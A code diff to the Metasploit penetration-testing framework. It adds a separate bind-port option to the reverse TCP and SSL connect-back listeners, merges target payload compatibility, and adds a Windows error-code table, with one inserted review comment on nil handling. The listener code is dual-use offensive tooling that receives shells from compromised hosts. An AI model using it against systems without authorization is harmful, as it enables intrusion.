@@ -53,8 +53,9 @@ module ReverseTcp [ OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), - OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]), + OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]) ], Msf::Handler::ReverseTcp) @@ -72,13 +73,6 @@ module ReverseTcp end ex = false - # Switch to IPv6 ANY address if the LHOST is also IPv6 - addr = Rex::Socket.resolv_nbo(datastore['LHOST']) - # First attempt to bind LHOST. If that fails, the user probably has - # something else listening on that interface. Try again with ANY_ADDR. - any = (addr.length == 4) ? "0.0.0.0" : "::0" - - addrs = [ Rex::Socket.addr_ntoa(addr), any ] comm = datastore['ReverseListenerComm'] if comm.to_s == "local" @@ -87,19 +81,15 @@ module ReverseTcp comm = nil end - if not datastore['ReverseListenerBindAddress'].to_s.empty? - # Only try to bind to this specific interface - addrs = [ datastore['ReverseListenerBindAddress'] ] + local_port = bind_port + addrs = bind_address - # Pick the right "any" address if either wildcard is used - addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") - end addrs.each { |ip| begin self.listener_sock = Rex::Socket::TcpServer.create( 'LocalHost' => ip, - 'LocalPort' => datastore['LPORT'].to_i, + 'LocalPort' => local_port, 'Comm' => comm, 'Context' => { 
@@ -119,11 +109,11 @@ module ReverseTcp via = "" end - print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}") + print_status("Started reverse handler on #{ip}:#{local_port} #{via}") break rescue ex = $! - print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + print_error("Handler failed to bind to #{ip}:#{local_port}") end } raise ex if (ex) @@ -140,7 +130,8 @@ module ReverseTcp # Starts monitoring for an inbound connection. # def start_handler - self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) { + local_port = bind_port + self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) { client = nil begin @@ -159,7 +150,7 @@ module ReverseTcp end while true } - self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) { + self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) { while true client = self.handler_queue.pop begin 
@@ -241,6 +232,31 @@ module ReverseTcp protected + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + attr_accessor :listener_sock # :nodoc: attr_accessor :listener_thread # :nodoc: attr_accessor :handler_thread # :nodoc: diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb index 61a1ae8b4a..e469054d65 100644 --- a/lib/msf/core/handler/reverse_tcp_ssl.rb +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb @@ -43,7 +43,9 @@ module ReverseTcpSsl super register_advanced_options( [ - OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']) + OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), + OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]) ], Msf::Handler::ReverseTcpSsl) end 
@@ -59,13 +61,6 @@ module ReverseTcpSsl end ex = false - # Switch to IPv6 ANY address if the LHOST is also IPv6 - addr = Rex::Socket.resolv_nbo(datastore['LHOST']) - # First attempt to bind LHOST. If that fails, the user probably has - # something else listening on that interface. Try again with ANY_ADDR. - any = (addr.length == 4) ? "0.0.0.0" : "::0" - - addrs = [ Rex::Socket.addr_ntoa(addr), any ] comm = datastore['ReverseListenerComm'] if comm.to_s == "local" @@ -74,20 +69,16 @@ module ReverseTcpSsl comm = nil end - if not datastore['ReverseListenerBindAddress'].to_s.empty? - # Only try to bind to this specific interface - addrs = [ datastore['ReverseListenerBindAddress'] ] + local_port = bind_port + addrs = bind_address - # Pick the right "any" address if either wildcard is used - addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") - end addrs.each { |ip| begin comm.extend(Rex::Socket::SslTcp) self.listener_sock = Rex::Socket::SslTcpServer.create( - 'LocalHost' => datastore['LHOST'], - 'LocalPort' => datastore['LPORT'].to_i, + 'LocalHost' => ip, + 'LocalPort' => local_port, 'Comm' => comm, 'SSLCert' => datastore['SSLCert'], 'Context' => 
@@ -108,16 +99,43 @@ module ReverseTcpSsl via = "" end - print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}") + print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}") break rescue ex = $! - print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + print_error("Handler failed to bind to #{ip}:#{local_port}") end } raise ex if (ex) end +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end end diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index e37f4eed70..36acc612ad 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -449,6 +449,9 @@ class Module ch = self.compat['Nop'] elsif (mod.type == MODULE_PAYLOAD) ch = self.compat['Payload'] + if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat'] + ch = ch.merge(self.target['Payload']['Compat']) + end else return true end diff --git a/lib/msf/core/post/windows.rb b/lib/msf/core/post/windows.rb index a504e65670..af386267c3 100644 --- a/lib/msf/core/post/windows.rb +++ b/lib/msf/core/post/windows.rb 
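Review bot: In the module.rb hunk, the added condition indexes `self.target['Payload']` after checking only `respond_to?("target")`. If `target` can return nil (for example when no target is selected; the accessor is outside the hunk), the compatibility check raises NoMethodError instead of falling back to `self.compat['Payload']`. `ch.merge` likewise assumes `self.compat['Payload']` is a Hash. A guarded form would be `tcompat = self.target && self.target['Payload'] && self.target['Payload']['Compat']` followed by `ch = ch.merge(tcompat) if ch && tcompat`. It would also help to add a comment on precedence: `# target-level Compat keys override module-level ones`. The enclosing method starts and ends outside the hunk.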
@@ -1,5 +1,6 @@ module Msf::Post::Windows + require 'msf/core/post/windows/error' require 'msf/core/post/windows/accounts' require 'msf/core/post/windows/cli_parse' require 'msf/core/post/windows/eventlog' diff --git a/lib/msf/core/post/windows/error.rb b/lib/msf/core/post/windows/error.rb new file mode 100644 index 0000000000..6557d729a1 --- /dev/null +++ b/lib/msf/core/post/windows/error.rb 
@@ -0,0 +1,2531 @@ + +module Msf::Post::Windows::Error + SUCCESS = 0x0000 + INVALID_FUNCTION = 0x0001 + FILE_NOT_FOUND = 0x0002 + PATH_NOT_FOUND = 0x0003 + TOO_MANY_OPEN_FILES = 0x0004 + ACCESS_DENIED = 0x0005 + INVALID_HANDLE = 0x0006 + ARENA_TRASHED = 0x0007 + NOT_ENOUGH_MEMORY = 0x0008 + INVALID_BLOCK = 0x0009 + BAD_ENVIRONMENT = 0x000A + BAD_FORMAT = 0x000B + INVALID_ACCESS = 0x000C + INVALID_DATA = 0x000D + OUTOFMEMORY = 0x000E + INVALID_DRIVE = 0x000F + CURRENT_DIRECTORY = 0x0010 + NOT_SAME_DEVICE = 0x0011 + NO_MORE_FILES = 0x0012 + WRITE_PROTECT = 0x0013 + BAD_UNIT = 0x0014 + NOT_READY = 0x0015 + BAD_COMMAND = 0x0016 + CRC = 0x0017 + BAD_LENGTH = 0x0018 + SEEK = 0x0019 + NOT_DOS_DISK = 0x001A + SECTOR_NOT_FOUND = 0x001B + OUT_OF_PAPER = 0x001C + WRITE_FAULT = 0x001D + READ_FAULT = 0x001E + GEN_FAILURE = 0x001F + SHARING_VIOLATION = 0x0020 + LOCK_VIOLATION = 0x0021 + WRONG_DISK = 0x0022 + SHARING_BUFFER_EXCEEDED = 0x0024 + HANDLE_EOF = 0x0026 + HANDLE_DISK_FULL = 0x0027 + NOT_SUPPORTED = 0x0032 + REM_NOT_LIST = 0x0033 + DUP_NAME = 0x0034 + BAD_NETPATH = 0x0035 + NETWORK_BUSY = 0x0036 + DEV_NOT_EXIST = 0x0037 + TOO_MANY_CMDS = 0x0038 + ADAP_HDW_ERR = 0x0039 + BAD_NET_RESP = 0x003A + UNEXP_NET_ERR = 0x003B + BAD_REM_ADAP = 0x003C + PRINTQ_FULL = 0x003D + NO_SPOOL_SPACE = 0x003E + PRINT_CANCELLED = 0x003F + NETNAME_DELETED = 0x0040 + NETWORK_ACCESS_DENIED = 0x0041 + BAD_DEV_TYPE = 0x0042 + BAD_NET_NAME = 0x0043 + TOO_MANY_NAMES = 0x0044 + TOO_MANY_SESS = 0x0045 + SHARING_PAUSED = 0x0046 + REQ_NOT_ACCEP = 0x0047 + REDIR_PAUSED = 0x0048 + FILE_EXISTS = 0x0050 + CANNOT_MAKE = 0x0052 + FAIL_I24 = 0x0053 + OUT_OF_STRUCTURES = 0x0054 + ALREADY_ASSIGNED = 0x0055 + INVALID_PASSWORD = 0x0056 + INVALID_PARAMETER = 0x0057 + NET_WRITE_FAULT = 0x0058 + NO_PROC_SLOTS = 0x0059 + TOO_MANY_SEMAPHORES = 0x0064 + EXCL_SEM_ALREADY_OWNED = 0x0065 + SEM_IS_SET = 0x0066 + TOO_MANY_SEM_REQUESTS = 0x0067 + INVALID_AT_INTERRUPT_TIME = 0x0068 + SEM_OWNER_DIED = 0x0069 + SEM_USER_LIMIT = 
0x006A + DISK_CHANGE = 0x006B + DRIVE_LOCKED = 0x006C + BROKEN_PIPE = 0x006D + OPEN_FAILED = 0x006E + BUFFER_OVERFLOW = 0x006F + DISK_FULL = 0x0070 + NO_MORE_SEARCH_HANDLES = 0x0071 + INVALID_TARGET_HANDLE = 0x0072 + INVALID_CATEGORY = 0x0075 + INVALID_VERIFY_SWITCH = 0x0076 + BAD_DRIVER_LEVEL = 0x0077 + CALL_NOT_IMPLEMENTED = 0x0078 + SEM_TIMEOUT = 0x0079 + INSUFFICIENT_BUFFER = 0x007A + INVALID_NAME = 0x007B + INVALID_LEVEL = 0x007C + NO_VOLUME_LABEL = 0x007D + MOD_NOT_FOUND = 0x007E + PROC_NOT_FOUND = 0x007F + WAIT_NO_CHILDREN = 0x0080 + CHILD_NOT_COMPLETE = 0x0081 + DIRECT_ACCESS_HANDLE = 0x0082 + NEGATIVE_SEEK = 0x0083 + SEEK_ON_DEVICE = 0x0084 + IS_JOIN_TARGET = 0x0085 + IS_JOINED = 0x0086 + IS_SUBSTED = 0x0087 + NOT_JOINED = 0x0088 + NOT_SUBSTED = 0x0089 + JOIN_TO_JOIN = 0x008A + SUBST_TO_SUBST = 0x008B + JOIN_TO_SUBST = 0x008C + SUBST_TO_JOIN = 0x008D + BUSY_DRIVE = 0x008E + SAME_DRIVE = 0x008F + DIR_NOT_ROOT = 0x0090 + DIR_NOT_EMPTY = 0x0091 + IS_SUBST_PATH = 0x0092 + IS_JOIN_PATH = 0x0093 + PATH_BUSY = 0x0094 + IS_SUBST_TARGET = 0x0095 + SYSTEM_TRACE = 0x0096 + INVALID_EVENT_COUNT = 0x0097 + TOO_MANY_MUXWAITERS = 0x0098 + INVALID_LIST_FORMAT = 0x0099 + LABEL_TOO_LONG = 0x009A + TOO_MANY_TCBS = 0x009B + SIGNAL_REFUSED = 0x009C + DISCARDED = 0x009D + NOT_LOCKED = 0x009E + BAD_THREADID_ADDR = 0x009F + BAD_ARGUMENTS = 0x00A0 + BAD_PATHNAME = 0x00A1 + SIGNAL_PENDING = 0x00A2 + MAX_THRDS_REACHED = 0x00A4 + LOCK_FAILED = 0x00A7 + BUSY = 0x00AA + CANCEL_VIOLATION = 0x00AD + ATOMIC_LOCKS_NOT_SUPPORTED = 0x00AE + INVALID_SEGMENT_NUMBER = 0x00B4 + INVALID_ORDINAL = 0x00B6 + ALREADY_EXISTS = 0x00B7 + INVALID_FLAG_NUMBER = 0x00BA + SEM_NOT_FOUND = 0x00BB + INVALID_STARTING_CODESEG = 0x00BC + INVALID_STACKSEG = 0x00BD + INVALID_MODULETYPE = 0x00BE + INVALID_EXE_SIGNATURE = 0x00BF + EXE_MARKED_INVALID = 0x00C0 + BAD_EXE_FORMAT = 0x00C1 + ITERATED_DATA_EXCEEDS_64k = 0x00C2 + INVALID_MINALLOCSIZE = 0x00C3 + DYNLINK_FROM_INVALID_RING = 0x00C4 + IOPL_NOT_ENABLED = 0x00C5 + 
INVALID_SEGDPL = 0x00C6 + AUTODATASEG_EXCEEDS_64k = 0x00C7 + RING2SEG_MUST_BE_MOVABLE = 0x00C8 + RELOC_CHAIN_XEEDS_SEGLIM = 0x00C9 + INFLOOP_IN_RELOC_CHAIN = 0x00CA + ENVVAR_NOT_FOUND = 0x00CB + NO_SIGNAL_SENT = 0x00CD + FILENAME_EXCED_RANGE = 0x00CE + RING2_STACK_IN_USE = 0x00CF + META_EXPANSION_TOO_LONG = 0x00D0 + INVALID_SIGNAL_NUMBER = 0x00D1 + THREAD_1_INACTIVE = 0x00D2 + LOCKED = 0x00D4 + TOO_MANY_MODULES = 0x00D6 + NESTING_NOT_ALLOWED = 0x00D7 + EXE_MACHINE_TYPE_MISMATCH = 0x00D8 + EXE_CANNOT_MODIFY_SIGNED_BINARY = 0x00D9 + EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY = 0x00DA + FILE_CHECKED_OUT = 0x00DC + CHECKOUT_REQUIRED = 0x00DD + BAD_FILE_TYPE = 0x00DE + FILE_TOO_LARGE = 0x00DF + FORMS_AUTH_REQUIRED = 0x00E0 + VIRUS_INFECTED = 0x00E1 + VIRUS_DELETED = 0x00E2 + PIPE_LOCAL = 0x00E5 + BAD_PIPE = 0x00E6 + PIPE_BUSY = 0x00E7 + NO_DATA = 0x00E8 + PIPE_NOT_CONNECTED = 0x00E9 + MORE_DATA = 0x00EA + VC_DISCONNECTED = 0x00F0 + INVALID_EA_NAME = 0x00FE + EA_LIST_INCONSISTENT = 0x00FF + WAIT_TIMEOUT = 0x0102 + NO_MORE_ITEMS = 0x0103 + CANNOT_COPY = 0x010A + DIRECTORY = 0x010B + EAS_DIDNT_FIT = 0x0113 + EA_FILE_CORRUPT = 0x0114 + EA_TABLE_FULL = 0x0115 + INVALID_EA_HANDLE = 0x0116 + EAS_NOT_SUPPORTED = 0x011A + NOT_OWNER = 0x0120 + TOO_MANY_POSTS = 0x012A + PARTIAL_COPY = 0x012B + OPLOCK_NOT_GRANTED = 0x012C + INVALID_OPLOCK_PROTOCOL = 0x012D + DISK_TOO_FRAGMENTED = 0x012E + DELETE_PENDING = 0x012F + INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0x0130 + SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0x0131 + SECURITY_STREAM_IS_INCONSISTENT = 0x0132 + INVALID_LOCK_RANGE = 0x0133 + IMAGE_SUBSYSTEM_NOT_PRESENT = 0x0134 + NOTIFICATION_GUID_ALREADY_DEFINED = 0x0135 + MR_MID_NOT_FOUND = 0x013D + SCOPE_NOT_FOUND = 0x013E + FAIL_NOACTION_REBOOT = 0x015E + FAIL_SHUTDOWN = 0x015F + FAIL_RESTART = 0x0160 + MAX_SESSIONS_REACHED = 0x0161 + THREAD_MODE_ALREADY_BACKGROUND = 0x0190 + THREAD_MODE_NOT_BACKGROUND = 0x0191 + PROCESS_MODE_ALREADY_BACKGROUND = 0x0192 + 
PROCESS_MODE_NOT_BACKGROUND = 0x0193 + INVALID_ADDRESS = 0x01E7 + USER_PROFILE_LOAD = 0x01F4 + ARITHMETIC_OVERFLOW = 0x0216 + PIPE_CONNECTED = 0x0217 + PIPE_LISTENING = 0x0218 + VERIFIER_STOP = 0x0219 + ABIOS_ERROR = 0x021A + WX86_WARNING = 0x021B + WX86_ERROR = 0x021C + TIMER_NOT_CANCELED = 0x021D + UNWIND = 0x021E + BAD_STACK = 0x021F + INVALID_UNWIND_TARGET = 0x0220 + INVALID_PORT_ATTRIBUTES = 0x0221 + PORT_MESSAGE_TOO_LONG = 0x0222 + INVALID_QUOTA_LOWER = 0x0223 + DEVICE_ALREADY_ATTACHED = 0x0224 + INSTRUCTION_MISALIGNMENT = 0x0225 + PROFILING_NOT_STARTED = 0x0226 + PROFILING_NOT_STOPPED = 0x0227 + COULD_NOT_INTERPRET = 0x0228 + PROFILING_AT_LIMIT = 0x0229 + CANT_WAIT = 0x022A + CANT_TERMINATE_SELF = 0x022B + UNEXPECTED_MM_CREATE_ERR = 0x022C + UNEXPECTED_MM_MAP_ERROR = 0x022D + UNEXPECTED_MM_EXTEND_ERR = 0x022E + BAD_FUNCTION_TABLE = 0x022F + NO_GUID_TRANSLATION = 0x0230 + INVALID_LDT_SIZE = 0x0231 + INVALID_LDT_OFFSET = 0x0233 + INVALID_LDT_DESCRIPTOR = 0x0234 + TOO_MANY_THREADS = 0x0235 + THREAD_NOT_IN_PROCESS = 0x0236 + PAGEFILE_QUOTA_EXCEEDED = 0x0237 + LOGON_SERVER_CONFLICT = 0x0238 + SYNCHRONIZATION_REQUIRED = 0x0239 + NET_OPEN_FAILED = 0x023A + IO_PRIVILEGE_FAILED = 0x023B + CONTROL_C_EXIT = 0x023C + MISSING_SYSTEMFILE = 0x023D + UNHANDLED_EXCEPTION = 0x023E + APP_INIT_FAILURE = 0x023F + PAGEFILE_CREATE_FAILED = 0x0240 + INVALID_IMAGE_HASH = 0x0241 + NO_PAGEFILE = 0x0242 + ILLEGAL_FLOAT_CONTEXT = 0x0243 + NO_EVENT_PAIR = 0x0244 + DOMAIN_CTRLR_CONFIG_ERROR = 0x0245 + ILLEGAL_CHARACTER = 0x0246 + UNDEFINED_CHARACTER = 0x0247 + FLOPPY_VOLUME = 0x0248 + BIOS_FAILED_TO_CONNECT_INTERRUPT = 0x0249 + BACKUP_CONTROLLER = 0x024A + MUTANT_LIMIT_EXCEEDED = 0x024B + FS_DRIVER_REQUIRED = 0x024C + CANNOT_LOAD_REGISTRY_FILE = 0x024D + DEBUG_ATTACH_FAILED = 0x024E + SYSTEM_PROCESS_TERMINATED = 0x024F + DATA_NOT_ACCEPTED = 0x0250 + VDM_HARD_ERROR = 0x0251 + DRIVER_CANCEL_TIMEOUT = 0x0252 + REPLY_MESSAGE_MISMATCH = 0x0253 + LOST_WRITEBEHIND_DATA = 0x0254 + 
CLIENT_SERVER_PARAMETERS_INVALID = 0x0255 + NOT_TINY_STREAM = 0x0256 + STACK_OVERFLOW_READ = 0x0257 + CONVERT_TO_LARGE = 0x0258 + FOUND_OUT_OF_SCOPE = 0x0259 + ALLOCATE_BUCKET = 0x025A + MARSHALL_OVERFLOW = 0x025B + INVALID_VARIANT = 0x025C + BAD_COMPRESSION_BUFFER = 0x025D + AUDIT_FAILED = 0x025E + TIMER_RESOLUTION_NOT_SET = 0x025F + INSUFFICIENT_LOGON_INFO = 0x0260 + BAD_DLL_ENTRYPOINT = 0x0261 + BAD_SERVICE_ENTRYPOINT = 0x0262 + IP_ADDRESS_CONFLICT1 = 0x0263 + IP_ADDRESS_CONFLICT2 = 0x0264 + REGISTRY_QUOTA_LIMIT = 0x0265 + NO_CALLBACK_ACTIVE = 0x0266 + PWD_TOO_SHORT = 0x0267 + PWD_TOO_RECENT = 0x0268 + PWD_HISTORY_CONFLICT = 0x0269 + UNSUPPORTED_COMPRESSION = 0x026A + INVALID_HW_PROFILE = 0x026B + INVALID_PLUGPLAY_DEVICE_PATH = 0x026C + QUOTA_LIST_INCONSISTENT = 0x026D + EVALUATION_EXPIRATION = 0x026E + ILLEGAL_DLL_RELOCATION = 0x026F + DLL_INIT_FAILED_LOGOFF = 0x0270 + VALIDATE_CONTINUE = 0x0271 + NO_MORE_MATCHES = 0x0272 + RANGE_LIST_CONFLICT = 0x0273 + SERVER_SID_MISMATCH = 0x0274 + CANT_ENABLE_DENY_ONLY = 0x0275 + FLOAT_MULTIPLE_FAULTS = 0x0276 + FLOAT_MULTIPLE_TRAPS = 0x0277 + NOINTERFACE = 0x0278 + DRIVER_FAILED_SLEEP = 0x0279 + CORRUPT_SYSTEM_FILE = 0x027A + COMMITMENT_MINIMUM = 0x027B + PNP_RESTART_ENUMERATION = 0x027C + SYSTEM_IMAGE_BAD_SIGNATURE = 0x027D + PNP_REBOOT_REQUIRED = 0x027E + INSUFFICIENT_POWER = 0x027F + MULTIPLE_FAULT_VIOLATION = 0x0280 + SYSTEM_SHUTDOWN = 0x0281 + PORT_NOT_SET = 0x0282 + DS_VERSION_CHECK_FAILURE = 0x0283 + RANGE_NOT_FOUND = 0x0284 + NOT_SAFE_MODE_DRIVER = 0x0286 + FAILED_DRIVER_ENTRY = 0x0287 + DEVICE_ENUMERATION_ERROR = 0x0288 + MOUNT_POINT_NOT_RESOLVED = 0x0289 + INVALID_DEVICE_OBJECT_PARAMETER = 0x028A + MCA_OCCURED = 0x028B + DRIVER_DATABASE_ERROR = 0x028C + SYSTEM_HIVE_TOO_LARGE = 0x028D + DRIVER_FAILED_PRIOR_UNLOAD = 0x028E + VOLSNAP_PREPARE_HIBERNATE = 0x028F + HIBERNATION_FAILURE = 0x0290 + FILE_SYSTEM_LIMITATION = 0x0299 + ASSERTION_FAILURE = 0x029C + ACPI_ERROR = 0x029D + WOW_ASSERTION = 0x029E + 
PNP_BAD_MPS_TABLE = 0x029F + PNP_TRANSLATION_FAILED = 0x02A0 + PNP_IRQ_TRANSLATION_FAILED = 0x02A1 + PNP_INVALID_ID = 0x02A2 + WAKE_SYSTEM_DEBUGGER = 0x02A3 + HANDLES_CLOSED = 0x02A4 + EXTRANEOUS_INFORMATION = 0x02A5 + RXACT_COMMIT_NECESSARY = 0x02A6 + MEDIA_CHECK = 0x02A7 + GUID_SUBSTITUTION_MADE = 0x02A8 + STOPPED_ON_SYMLINK = 0x02A9 + LONGJUMP = 0x02AA + PLUGPLAY_QUERY_VETOED = 0x02AB + UNWIND_CONSOLIDATE = 0x02AC + REGISTRY_HIVE_RECOVERED = 0x02AD + DLL_MIGHT_BE_INSECURE = 0x02AE + DLL_MIGHT_BE_INCOMPATIBLE = 0x02AF + DBG_EXCEPTION_NOT_HANDLED = 0x02B0 + DBG_REPLY_LATER = 0x02B1 + DBG_UNABLE_TO_PROVIDE_HANDLE = 0x02B2 + DBG_TERMINATE_THREAD = 0x02B3 + DBG_TERMINATE_PROCESS = 0x02B4 + DBG_CONTROL_C = 0x02B5 + DBG_PRINTEXCEPTION_C = 0x02B6 + DBG_RIPEXCEPTION = 0x02B7 + DBG_CONTROL_BREAK = 0x02B8 + DBG_COMMAND_EXCEPTION = 0x02B9 + OBJECT_NAME_EXISTS = 0x02BA + THREAD_WAS_SUSPENDED = 0x02BB + IMAGE_NOT_AT_BASE = 0x02BC + RXACT_STATE_CREATED = 0x02BD + SEGMENT_NOTIFICATION = 0x02BE + BAD_CURRENT_DIRECTORY = 0x02BF + FT_READ_RECOVERY_FROM_BACKUP = 0x02C0 + FT_WRITE_RECOVERY = 0x02C1 + IMAGE_MACHINE_TYPE_MISMATCH = 0x02C2 + RECEIVE_PARTIAL = 0x02C3 + RECEIVE_EXPEDITED = 0x02C4 + RECEIVE_PARTIAL_EXPEDITED = 0x02C5 + EVENT_DONE = 0x02C6 + EVENT_PENDING = 0x02C7 + CHECKING_FILE_SYSTEM = 0x02C8 + FATAL_APP_EXIT = 0x02C9 + PREDEFINED_HANDLE = 0x02CA + WAS_UNLOCKED = 0x02CB + SERVICE_NOTIFICATION = 0x02CC + WAS_LOCKED = 0x02CD + LOG_HARD_ERROR = 0x02CE + ALREADY_WIN32 = 0x02CF + IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x02D0 + NO_YIELD_PERFORMED = 0x02D1 + TIMER_RESUME_IGNORED = 0x02D2 + ARBITRATION_UNHANDLED = 0x02D3 + CARDBUS_NOT_SUPPORTED = 0x02D4 + MP_PROCESSOR_MISMATCH = 0x02D5 + HIBERNATED = 0x02D6 + RESUME_HIBERNATION = 0x02D7 + FIRMWARE_UPDATED = 0x02D8 + DRIVERS_LEAKING_LOCKED_PAGES = 0x02D9 + WAKE_SYSTEM = 0x02DA + WAIT_1 = 0x02DB + WAIT_2 = 0x02DC + WAIT_3 = 0x02DD + WAIT_63 = 0x02DE + ABANDONED_WAIT_0 = 0x02DF + ABANDONED_WAIT_63 = 0x02E0 + USER_APC = 0x02E1 + 
KERNEL_APC = 0x02E2 + ALERTED = 0x02E3 + ELEVATION_REQUIRED = 0x02E4 + REPARSE = 0x02E5 + OPLOCK_BREAK_IN_PROGRESS = 0x02E6 + VOLUME_MOUNTED = 0x02E7 + RXACT_COMMITTED = 0x02E8 + NOTIFY_CLEANUP = 0x02E9 + PRIMARY_TRANSPORT_CONNECT_FAILED = 0x02EA + PAGE_FAULT_TRANSITION = 0x02EB + PAGE_FAULT_DEMAND_ZERO = 0x02EC + PAGE_FAULT_COPY_ON_WRITE = 0x02ED + PAGE_FAULT_GUARD_PAGE = 0x02EE + PAGE_FAULT_PAGING_FILE = 0x02EF + CACHE_PAGE_LOCKED = 0x02F0 + CRASH_DUMP = 0x02F1 + BUFFER_ALL_ZEROS = 0x02F2 + REPARSE_OBJECT = 0x02F3 + RESOURCE_REQUIREMENTS_CHANGED = 0x02F4 + TRANSLATION_COMPLETE = 0x02F5 + NOTHING_TO_TERMINATE = 0x02F6 + PROCESS_NOT_IN_JOB = 0x02F7 + PROCESS_IN_JOB = 0x02F8 + VOLSNAP_HIBERNATE_READY = 0x02F9 + FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x02FA + INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x02FB + INTERRUPT_STILL_CONNECTED = 0x02FC + WAIT_FOR_OPLOCK = 0x02FD + DBG_EXCEPTION_HANDLED = 0x02FE + DBG_CONTINUE = 0x02FF + CALLBACK_POP_STACK = 0x0300 + COMPRESSION_DISABLED = 0x0301 + CANTFETCHBACKWARDS = 0x0302 + CANTSCROLLBACKWARDS = 0x0303 + ROWSNOTRELEASED = 0x0304 + BAD_ACCESSOR_FLAGS = 0x0305 + ERRORS_ENCOUNTERED = 0x0306 + NOT_CAPABLE = 0x0307 + REQUEST_OUT_OF_SEQUENCE = 0x0308 + VERSION_PARSE_ERROR = 0x0309 + BADSTARTPOSITION = 0x030A + MEMORY_HARDWARE = 0x030B + DISK_REPAIR_DISABLED = 0x030C + INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x030D + SYSTEM_POWERSTATE_TRANSITION = 0x030E + SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x030F + MCA_EXCEPTION = 0x0310 + ACCESS_AUDIT_BY_POLICY = 0x0311 + ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x0312 + ABANDON_HIBERFILE = 0x0313 + LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x0314 + LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x0315 + LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x0316 + BAD_MCFG_TABLE = 0x0317 + OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x0320 + CANNOT_GRANT_REQUESTED_OPLOCK = 0x0321 + CANNOT_BREAK_OPLOCK = 0x0322 + OPLOCK_HANDLE_CLOSED = 0x0323 + NO_ACE_CONDITION = 0x0324 + INVALID_ACE_CONDITION = 0x0325 
